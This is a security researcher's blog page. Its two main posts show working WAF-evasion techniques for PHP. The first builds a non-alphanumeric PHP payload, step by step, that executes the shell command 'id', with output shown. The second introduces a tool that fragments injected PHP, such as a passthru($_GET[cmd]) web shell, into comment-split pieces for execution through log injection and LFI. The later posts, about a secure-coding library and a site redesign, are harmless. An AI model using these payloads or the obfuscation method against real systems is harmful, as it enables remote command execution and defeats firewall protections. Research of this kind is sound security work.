Just Another Hacker
Author's avatar

Generating non-alphanumeric PHP payloads

The other day I was fiddling with PHP on the command line and wondered how difficult it might be to write non-alphanumeric code in PHP as a potential way to bypass Web Application Firewalls. Something like a worse JSFuck, but for PHP!

As this is just an experiment I’ll be happy with a working example that can run shell commands, such as id.

The first step towards being able to do this is being able to generate strings or single characters using only non alphanumeric syntax. It would prove quite difficult to run the command id without the letters i and d.

NAN

My initial approach was to try to capture some kind of error message, and divide by zero seemed to work:

php -r 'var_dump(0/0);'
            PHP Warning:  Division by zero in Command line code on line 1
            float(NAN)

This can be converted to a string by concatenating it to an empty string:

php -r 'var_dump("".(0/0));'
            PHP Warning:  Division by zero in Command line code on line 1
            string(3) "NAN"

And the divide operation can be achieved without numbers by diving an uninitialized variable with itself:

php -r 'var_dump("".($_/$_));'
            PHP Notice:  Undefined variable: _ in Command line code on line 1
            PHP Notice:  Undefined variable: _ in Command line code on line 1
            PHP Warning:  Division by zero in Command line code on line 1
            string(3) "NAN"

More strings

Using more experimentation I was able to produce a few more values: NULL $_=--$__;var_dump($_); I was unable to convert this to a string however..

  • “Array”

    php -r '$_="".[];var_dump($_);'
  • “1”

    php -r '$_="".++$__;var_dump($_);'
  • “2”

    php -r '++$__;$_="".++$__;var_dump($_);'
  • …etc

Alphabet

Now that we have some strings and numbers we can leverage this to build a full alphabet. We can already access the individual characters from a string using array cells and numbers, which gives us ANary12345678890, but we still don’t have the required characters. We need to manipulate the ones we have to create additional ones. There are several PHP operators that are helpful for this, bitwise shifting, xor, or and and will let us craft the remaining ones. For example we can craft “O” via bitwise or of the “A” and “N’ from”NAN":

php -r '$a="NAN";$a=$a[0]|$a[1];var_dump($a);'
            string(1) "O"

Expanding on this I used xor values to xor again and got the required characters for to command id:

“i”

php -r '$m="1"^"9";$a="a"^$m;var_dump($a);'

“d”

php -r '$m="1"^"4";$a="a"^$m;var_dump($a);'

Building a payload

Now that we have several building blocks we can start combining these into our final payload. I tried writing it in non-alphanumeric form directly at first, but it made tracking variables and making frequent changes difficult, so I opted to name variables properly and verify that it worked first, starting by making the i:

php -r '$one="".++$one;$four++;$four++;$four++;$nine=$four*$four;$nine="".$nine;$three=$four;$four="".++$four;$mod=$one^$nine;$arr="".[];$i=$arr[$three]^$mod;var_dump($i);'
            PHP Notice:  Array to string conversion in Command line code on line 1
            PHP Notice:  Undefined variable: one in Command line code on line 1
            PHP Notice:  Undefined variable: four in Command line code on line 1
            string(1) "i"

Next we can add the d and execute the command:

php -r '$one="".++$one;$four++;$four++;$four++;$nine=$four*$four;$nine="".$nine;$three=$four;$four="".++$four;$mod=$one^$nine;$arr="".[];$i=$arr[$three]^$mod;$mod=$one^$four;$d=$arr[$three]^$mod;$c=`$i$d`;print $c;'
            PHP Notice:  Array to string conversion in Command line code on line 1
            PHP Notice:  Undefined variable: one in Command line code on line 1
            PHP Notice:  Undefined variable: four in Command line code on line 1
            uid=1000(eldar) gid=1000(eldar) groups=1000(eldar),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev)

Then I spotted a way to shorten the code a tiny bit by assigning and accessing the a char rather than the array cell every time:

php -r '$one="".++$one;$four++;$four++;$four++;$nine=$four*$four;$nine="".$nine;$three=$four;$four="".++$four;$mod=$one^$nine;$a="".[];$a=$a[$three];$i=$a^$mod;$mod=$one^$four;$d=$a^$mod;$c=`$i$d`;print $c;'

I then proceeded to reduce the number of unique variables somewhat, this makes the conversion to non-alphanumeric a little easier:

php -r '$one="".++$one;$four++;$four++;$four++;$nine=$four*$four;$nine="".$nine;$three=$four;$four="".++$four;$mod=$one^$nine;$a="".[];$a=$a[$three];$three=$a^$mod;$mod=$one^$four;$one=$a^$mod;$four=`$three$one`;print $four;'

In order to reduce the payload length I counted the occurrences of each unique variable, to make the most frequent variable have the shortest non-alphanumeric name.

  • one - 6
  • three - 4
  • four - 11
  • etc..

then replace four with _, one with __ and so on. Which gives us the final version:

$__="".++$__;$_++;$_++;$_++;$_____=$_*$_;$_____="".$_____;$____=$_;$_="".++$_;$______=$__^$_____;$___="".[];$___=$___[$____];$____=$___^$______;$______=$__^$_;$__=$___^$______;$_=`$____$__`;print $_;

The print statement is just there to prove that it worked and would not be part of the payload as print (and the space?) is alphanumeric. In conclusion I think there is lots of room for improvements like optimization of alphabet generation and variable reuse for more compact payloads, but I was able to make it work and thats enough for me.

Author's avatar

PHP omelette, code fragmentation for scripting languages

Code fragmentation is not exactly a new technique, when dealing with binary exploitation, techniques like egg hunter and omelette refers to various ways to bootstrap a larger payload from a smaller one. However when I needed to bypass a modern WAF on a pentest where I could inject a user controlled value into a log file which could then be executed via LFI I came up with this technique to fragment the payload in a way that it is fragmented, but still executes as if it was consecutive function calls. I was waiting to release this at a future conference talk, but as Robin recently wrote a blog post using a similar technique to execute fragmented javascript I though the time was right for releasing it now.

Concept

The broad concept is:

  1. Everything inside the <?php ?> tags is code
  2. Everything inside the /* */ multi line comments are ignored
  3. PHP parsing has some flexibility

The preferred use of this is to inject a small stager payload, but bigger files could be transformed as well.

The steps are simple enough that they can be performed manually:

  1. Add comment after all opening tags
  2. Add comment before all closing tags
  3. Add comments before and after semi colons
  4. Add comment after comma
  5. Add comments before and after opening and closing pharanteses
  6. Remove duplicate comments
  7. Insert new line before each closing multi line comment
  8. Remove empty lines
  ./omelette '<?=passthru($_GET[cmd]);?>'
            
                     _            _   _         _            _             _          _          _            _
                    /\ \         /\_\/\_\ _    /\ \         _\ \          /\ \       /\ \       /\ \         /\ \
                   /  \ \       / / / / //\_\ /  \ \       /\__ \        /  \ \      \_\ \      \_\ \       /  \ \
                  / /\ \ \     /\ \/ \ \/ / // /\ \ \     / /_ \_\      / /\ \ \     /\__ \     /\__ \     / /\ \ \
                 / / /\ \ \   /  \____\__/ // / /\ \_\   / / /\/_/     / / /\ \_\   / /_ \ \   / /_ \ \   / / /\ \_\
                / / /  \ \_\ / /\/________// /_/_ \/_/  / / /         / /_/_ \/_/  / / /\ \ \ / / /\ \ \ / /_/_ \/_/
               / / /   / / // / /\/_// / // /____/\    / / /         / /____/\    / / /  \/_// / /  \/_// /____/\
              / / /   / / // / /    / / // /\____\/   / / / ____    / /\____\/   / / /      / / /      / /\____\/
             / / /___/ / // / /    / / // / /______  / /_/_/ ___/\ / / /______  / / /      / / /      / / /______
            / / /____\/ / \/_/    / / // / /_______\/_______/\__\// / /_______\/_/ /      /_/ /      / / /_______\
            \/_________/          \/_/ \/__________/\_______\/    \/__________/\_\/       \_\/       \/__________/
            
            ============================================================================[justanotherhacker.com]===
            <?= /*
            */passthru/*
            */(/*
            */$_GET[cmd]/*
            */)/*
            */;/*
            */?>

Or if fragmenting code from a file:

./omelette "$(cat t/shell3.php)" > plate

The various scripts to fragment and inject the code can be found at: https://github.com/wireghoul/php-omelette. While aimed at PHP the generic methods outlined above can be applied to many languages, including javascript, C/C++ and others.

Author's avatar

Announcing safelity

Safelity is a proof of concept PHP library for secure coding. It was released on github a while ago, but formally introduced as part of my presentation “Codified security”, presented at GIDS today. It differs from traditional secure coding concepts in that it aims to make safe code visually identifiable when reading and writing code. But also make it hard to use in an unsafe manner and allow easy auditing of code written with the library. Unfortunately it is a limited functionality library, but I think it illustrates that you can make secure coding about writing secure code as opposed to trying to turn great developers into security experts.

This is predominantly inspired by Joel on software’s post about making wrong code look wrong https://www.joelonsoftware.com/2005/05/11/making-wrong-code-look-wrong/ and the clever engineering that makes parameterized queries/prepared statements very secure and simple to use.

You can find the code on https://github.com/wireghoul/safelity, the talk is being recorded, but may only be available on the conference website.

Author's avatar

The new new

It’s been a while since the last revamp, but I decided to renovate the blog. All of the old content has been moved to http://archive.justanotherhacker.com. I stuck with the notion of a static site generator, and wrote my own with a little inspiration from Bashyll and Roman Zolotarev’s ssg. The design is based on PureCSS, a CSS grid layout system similar to bootstrap without the need for JavaScript.

There are a few upcoming project releases so check back soon!

graudit

Static source code analysis tool for finding vulnerabilities in source code.

htshells

Self contained attacks against per directory configuration in web servers.

PHP omelette

Code obfuscation tool for bypassing web application firewalls.

More

All of the project information on one page!